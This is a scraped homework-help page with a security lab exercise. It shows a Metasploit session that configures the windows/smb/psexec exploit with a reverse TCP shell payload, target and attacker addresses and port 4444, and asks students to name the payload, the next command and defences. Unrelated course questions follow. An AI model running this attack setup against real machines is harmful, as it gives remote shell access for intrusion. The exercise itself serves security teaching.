Question: What is the vulnerability and exploit used in this attack? 2- What is the payload used? 3- What is the transport

   What is the vulnerability and exploit used in this attack?

2-      What is the payload used?

3-      What is the transport mechanism for this payload and why is it used?

4-      The attacker must configure 1 more parameter. What is that parameter?

5-      What are the values for the following parameters:

a.       The attacker's machine

b.       The attacker's port

c.       The victim's machine

d.       The victim's port

6-      What command will you type next? (Hint: the attack is fully set up)

7-      If the attack is successful, what can the hacker do on the target machine?

8-      How can you defend against this exploit?


msf5 > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5exploit(windows/smb/psexec) > set RHOST 192.168.100 RHOST 192.168.100 msf5 exploit(windows/smb/psexec) > set LHOST

msf5 > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/psexec) > set RHOST 192.168.100 RHOST 192.168.100 msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.25 LHOST 192.168.1.25 msf5 exploit (windows/smb/psexec) > set LPORT 4444 LPORT 4444 msf5 exploit(windows/smb/psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD windows/shell/reverse_tcp msf5 exploit (windows/smb/psexec) > Payload options (windows/shell/reverse_tcp): Name EXITFUNC thread LHOST LPORT Current Setting Required Desc Exit The The Name 192.168.1.25 4444 msf5 exploit(windows/smb/psexec > show options Module options (exploit/windows/smb/psexec): RHOSTS syntax 'file: ' RPORT SERVICE DESCRIPTION SMBDomain SMBPass SMBUser SERVICE_DISPLAY_NAME yes yes yes Current Setting Required 192.168.100 445 SERVICE_NAME SHARE ADMIN$ or a normal read/write folder share yes yes no no no yes no no no Payload options (windows/shell/reverse_tcp):

Step by Step Solution

There are 3 Steps involved in it

1 Expert Approved Answer
Step: 1 Unlock blur-text-image
Question Has Been Solved by an Expert!

Get step-by-step solutions from verified subject matter experts

Step: 2 Unlock
Step: 3 Unlock

Students Have Also Explored These Related Computer Network Questions!

Q:

Let A, B be sets. Define: (a) the Cartesian product (A B) (b) the set of relations R between A and B (c) the identity relation A on the set A [3 marks] Suppose S, T are relations between A and B, and...

Q:

can someone solve this Modern workstations typically have memory systems that incorporate two or three levels of caching. Explain why they are designed like this. [4 marks] In order to investigate...

Q:

Design a Java class that represents a cache with a fixed size. It should support operations like add, retrieve, and remove, and it should evict the least recently used item when it reaches capacity.

Q:

Exercise: Buffer Overflow (85 points) The Buffer Overflow vulnerability has been discovered as early as 1972, and has long been among the most critical application security flaws. It is still very...

Q:

computer security course, please I need help it due 3 hours. 1 Lab Overview The learning objective of this lab is for students to gain the first-hand experience on buffer-overflow vulner- ability by...

Q:

Read the following article and answer the questions that follow: Case Study: WannaCry Ransomware The WannaCry ransomware attack of May 2017 was one of the most widespread ransomware attacks,...

Q:

The malware used RSA and AES keys for the encryption, making it difficult to decrypt manually within the deadline. Though the decryptor was included within the payload, users that paid the ransom...

Q:

Module 2: Project - Part 1 Due Sep 5by11:59pm Points 0 Available Aug 30 at 12am - Sep 5 at 11:59pm7 days This assignment was locked on Sep 5 at 11:59 pm. Attached are the project directions (in green...

Q:

Understanding the TCP open/close connections is important for later in the semester. At a very high-level overview, if you were the client and you were trying to connect with your bank, what would...

Q:

Please look this over and make sure it makes sense and is written right. Also, make sure it is all correct. If a question is not correct please fix it. Thank you. Make a seven (7) layer diagram of an...

Q:

Why is the liability for warranties recognized when products are sold rather than when the warranty services are performed?

Q:

The Taffy Company Inc. (Taffy) has the following eamings history since being incorporated on January 1, 20x1. Year 20x1 20x2 20x3 20x4 20x5 20x6 20x7 20x8 Taxable Income (loss) ($800.000) 30% 600.000...

Q:

Find the first and second derivatives. v = 3 t 2 6 t 1 4 v ' =

Q:

Gioia Company acquired some of the 65,000 shares of outstanding common stock (no par) of Tristezza Corporation during 2011 as a long-term investment. The annual accounting period for both companies...

Q:

Presented below are terms preceded by letters a through j and a list of definitions 1 through 10. Enter the letter of the term with the definition, using the space preceding the definition. a. Cost...

Q:

Bill Binder's business nearly went under when Colorado almost passed the bottle bill. Binder's Beverage produced soft drinks for many of the large grocery stores in the area. After the bottle bill...

Q:

Gelbart Company manufactures gas grills. Fixed costs amount to $16,335,000 per year. Variable costs per gas grill are $225, and the average price per gas grill is $600. Required: 1. How many gas...

Q:

Albert transfers land (basis of $140,000 and fair market value of $320,000) to Gold Corporation for 80% of its stock and a note payable in the amount of $80,000. Gold assumes Albert's mortgage on the...

Q:

On April 1, Catelyn Company assigns under a notification basis specific accounts amounting to P6,000,000 to Stark Finance. Stark Finance shall advance to Catelyn Company 80% of the accounts assigned,...

Q:

In Listing 11.10, MyStack is implemented using composition. Define a new stack class that extends ArrayList.Draw the UML diagram for the classes and then implement MyStack. Write a test program that...

Q:

Write a program that prompts the user to enter the year and first day of the year and displays the calendar table for the year on the console. For example, if the user entered the year 2013, and 2...

Q:

Modify MyHashMap to allow duplicate keys for entries. You need to modify the implementation for the put(key, value) method. Also add a new method named getAll(key) that returns a set of values that...

Q:

Marni Restaurant Company engaged in the following transactions during March, its first month of operations. a. Received $100,000 cash from the sale of stock. b. Purchased $20,000 of inventory from...

Q:

Walters Inc. began operations on January 1, 2019. The following information relates to Walters' cash flows during 2019. Required: 1. Calculate the cash provided/used for each cash flow category. 2....

Q:

Zachary Corporation's December 31, 2018 balance sheet included the following amounts: Cash $ 20,400 Retained earnings 105,600 Zachary's accountant provided the following data for 2019:...